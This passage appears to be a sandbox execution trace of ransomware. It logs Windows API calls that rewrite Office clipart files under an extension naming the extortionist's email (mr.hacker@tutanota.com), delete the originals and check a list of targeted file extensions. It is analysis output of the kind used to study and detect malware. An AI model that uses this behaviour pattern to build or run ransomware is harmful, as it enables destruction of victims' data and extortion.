(hObject=0x1f8) returned 1 [0056.405] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09194_.wmf")) returned 0x20 [0056.405] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09194_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0056.405] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09194_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0056.405] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.405] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.405] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09194_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0056.406] GetLastError () returned 0x0 [0056.406] ReadFile (in: hFile=0x1f8, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x38cc, lpOverlapped=0x0) returned 1 [0056.407] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x38d0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x38d0, lpOverlapped=0x0) returned 1 [0056.409] ReadFile (in: hFile=0x1f8, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0056.409] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.409] SetEndOfFile (hFile=0x1f0) returned 1 [0056.409] CloseHandle (hObject=0x1f0) returned 1 [0056.409] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.409] SetEndOfFile (hFile=0x1f8) returned 1 [0056.410] CloseHandle (hObject=0x1f8) returned 1 [0056.412] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0056.413] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09194_.wmf")) returned 1 [0056.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63 [0056.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63 [0056.413] lstrlenW (lpString=".doc") returned 4 [0056.413] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.413] lstrlenW (lpString=".docx") returned 5 [0056.413] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.413] lstrlenW (lpString=".pdf") returned 4 [0056.413] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.413] lstrlenW (lpString=".xls") returned 4 [0056.413] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.413] lstrlenW (lpString=".xlsx") returned 5 [0056.413] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.413] lstrlenW (lpString=".ppt") returned 4 [0056.413] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63 [0056.413] lstrlenW (lpString=".zip") returned 4 [0056.413] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.413] lstrlenW (lpString=".rar") returned 4 [0056.413] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.413] lstrlenW (lpString=".bz2") returned 4 [0056.413] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.414] lstrlenW (lpString=".7z") returned 3 [0056.414] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63 [0056.414] lstrlenW (lpString=".dbf") returned 4 [0056.414] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63 [0056.414] lstrlenW (lpString=".1cd") returned 4 [0056.414] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63 [0056.414] lstrlenW (lpString=".jpg") returned 4 [0056.414] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.414] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=20554) returned 1 [0056.414] CloseHandle (hObject=0x1f8) returned 1 [0056.414] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09662_.wmf")) returned 0x20 [0056.414] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09662_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0056.414] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09662_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0056.414] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.415] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.415] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09662_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0056.415] GetLastError () returned 0x0 [0056.415] ReadFile (in: hFile=0x1f8, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x504a, lpOverlapped=0x0) returned 1 [0056.417] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x5050, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x5050, lpOverlapped=0x0) returned 1 [0056.418] ReadFile (in: hFile=0x1f8, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0056.418] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.418] SetEndOfFile (hFile=0x1f0) returned 1 [0056.418] CloseHandle (hObject=0x1f0) returned 1 [0056.418] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.418] SetEndOfFile (hFile=0x1f8) returned 1 [0056.419] CloseHandle (hObject=0x1f8) returned 1 [0056.419] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0056.420] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09662_.wmf")) returned 1 [0056.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63 [0056.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63 [0056.420] lstrlenW (lpString=".doc") returned 4 [0056.420] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.420] lstrlenW (lpString=".docx") returned 5 [0056.420] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.420] lstrlenW (lpString=".pdf") returned 4 [0056.420] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.420] lstrlenW (lpString=".xls") returned 4 [0056.420] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.420] lstrlenW (lpString=".xlsx") returned 5 [0056.420] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.420] lstrlenW (lpString=".ppt") returned 4 [0056.420] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63 [0056.420] lstrlenW (lpString=".zip") returned 4 [0056.420] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.420] lstrlenW (lpString=".rar") returned 4 [0056.420] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.420] lstrlenW (lpString=".bz2") returned 4 [0056.420] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.420] lstrlenW (lpString=".7z") returned 3 [0056.420] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63 [0056.420] lstrlenW (lpString=".dbf") returned 4 [0056.420] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63 [0056.421] lstrlenW (lpString=".1cd") returned 4 [0056.421] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63 [0056.421] lstrlenW (lpString=".jpg") returned 4 [0056.421] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.421] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=7966) returned 1 [0056.421] CloseHandle (hObject=0x1f8) returned 1 [0056.421] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf")) returned 0x20 [0056.421] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0056.421] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0056.421] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.421] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.421] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0056.422] GetLastError () returned 0x0 [0056.422] ReadFile (in: hFile=0x1f8, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x1f1e, lpOverlapped=0x0) returned 1 [0056.423] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1f20, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x1f20, lpOverlapped=0x0) returned 1 [0056.588] ReadFile (in: hFile=0x1f8, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0056.591] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.592] SetEndOfFile (hFile=0x1f0) returned 1 [0056.592] CloseHandle (hObject=0x1f0) returned 1 [0056.592] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.592] SetEndOfFile (hFile=0x1f8) returned 1 [0056.593] CloseHandle (hObject=0x1f8) returned 1 [0056.593] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0056.594] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf")) returned 1 [0056.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63 [0056.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63 [0056.956] lstrlenW (lpString=".doc") returned 4 [0056.956] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.957] lstrlenW (lpString=".docx") returned 5 [0056.957] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.957] lstrlenW (lpString=".pdf") returned 4 [0056.957] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.957] lstrlenW (lpString=".xls") returned 4 [0056.957] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.957] lstrlenW (lpString=".xlsx") returned 5 [0056.957] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.957] lstrlenW (lpString=".ppt") returned 4 [0056.957] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63 [0056.957] lstrlenW (lpString=".zip") returned 4 [0056.957] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.957] lstrlenW (lpString=".rar") returned 4 [0056.957] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.957] lstrlenW (lpString=".bz2") returned 4 [0056.957] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.957] lstrlenW (lpString=".7z") returned 3 [0056.957] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63 [0056.957] lstrlenW (lpString=".dbf") returned 4 [0056.957] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63 [0056.957] lstrlenW (lpString=".1cd") returned 4 [0056.957] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63 [0056.957] lstrlenW (lpString=".jpg") returned 4 [0056.957] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.953] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.953] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.953] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00012_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0057.953] GetLastError () returned 0x0 [0057.953] ReadFile (in: hFile=0x228, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x265a, lpOverlapped=0x0) returned 1 [0057.955] WriteFile (in: hFile=0x230, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2660, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x2660, lpOverlapped=0x0) returned 1 [0057.956] ReadFile (in: hFile=0x228, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0057.956] WriteFile (in: hFile=0x230, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.956] SetEndOfFile (hFile=0x230) returned 1 [0057.956] CloseHandle (hObject=0x230) returned 1 [0057.956] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.956] SetEndOfFile (hFile=0x228) returned 1 [0057.957] CloseHandle (hObject=0x228) returned 1 [0057.957] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0057.957] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00012_.wmf")) returned 1 [0057.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 63 [0057.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 63 [0057.958] lstrlenW (lpString=".doc") returned 4 [0057.958] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.958] lstrlenW (lpString=".docx") returned 5 [0057.958] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.958] lstrlenW (lpString=".pdf") returned 4 [0057.958] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.958] lstrlenW (lpString=".xls") returned 4 [0057.958] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.958] lstrlenW (lpString=".xlsx") returned 5 [0057.958] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.958] lstrlenW (lpString=".ppt") returned 4 [0057.958] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 63 [0057.958] lstrlenW (lpString=".zip") returned 4 [0057.958] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.958] lstrlenW (lpString=".rar") returned 4 [0057.958] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.958] lstrlenW (lpString=".bz2") returned 4 [0057.958] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.958] lstrlenW (lpString=".7z") returned 3 [0057.958] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 63 [0057.958] lstrlenW (lpString=".dbf") returned 4 [0057.958] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 63 [0057.958] lstrlenW (lpString=".1cd") returned 4 [0057.958] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 63 [0057.958] lstrlenW (lpString=".jpg") returned 4 [0057.958] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.967] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.974] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00254_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0057.980] GetLastError () returned 0x0 [0057.980] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x6c8, lpOverlapped=0x0) returned 1 [0057.981] WriteFile (in: hFile=0x248, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x6d0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x6d0, lpOverlapped=0x0) returned 1 [0057.982] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0057.982] WriteFile (in: hFile=0x248, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.982] SetEndOfFile (hFile=0x248) returned 1 [0057.982] CloseHandle (hObject=0x248) returned 1 [0057.982] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.982] SetEndOfFile (hFile=0x1b4) returned 1 [0057.983] CloseHandle (hObject=0x1b4) returned 1 [0057.983] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0057.983] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00254_.wmf")) returned 1 [0057.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63 [0057.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63 [0057.984] lstrlenW (lpString=".doc") returned 4 [0057.984] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.984] lstrlenW (lpString=".docx") returned 5 [0057.984] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.984] lstrlenW (lpString=".pdf") returned 4 [0057.984] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.984] lstrlenW (lpString=".xls") returned 4 [0057.984] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.984] lstrlenW (lpString=".xlsx") returned 5 [0057.984] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.984] lstrlenW (lpString=".ppt") returned 4 [0057.984] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63 [0057.984] lstrlenW (lpString=".zip") returned 4 [0057.984] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.984] lstrlenW (lpString=".rar") returned 4 [0057.984] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.984] lstrlenW (lpString=".bz2") returned 4 [0057.984] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.984] lstrlenW 